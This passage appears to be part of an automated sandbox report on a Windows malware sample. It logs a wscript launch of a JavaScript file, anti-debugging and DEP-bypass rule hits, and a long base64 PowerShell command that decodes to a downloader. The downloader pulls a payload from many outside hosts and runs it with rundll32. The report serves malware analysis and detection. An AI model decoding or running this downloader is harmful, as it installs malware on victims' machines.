QBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: wscript
parameters: "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
filepath: wscript
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcARQBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBA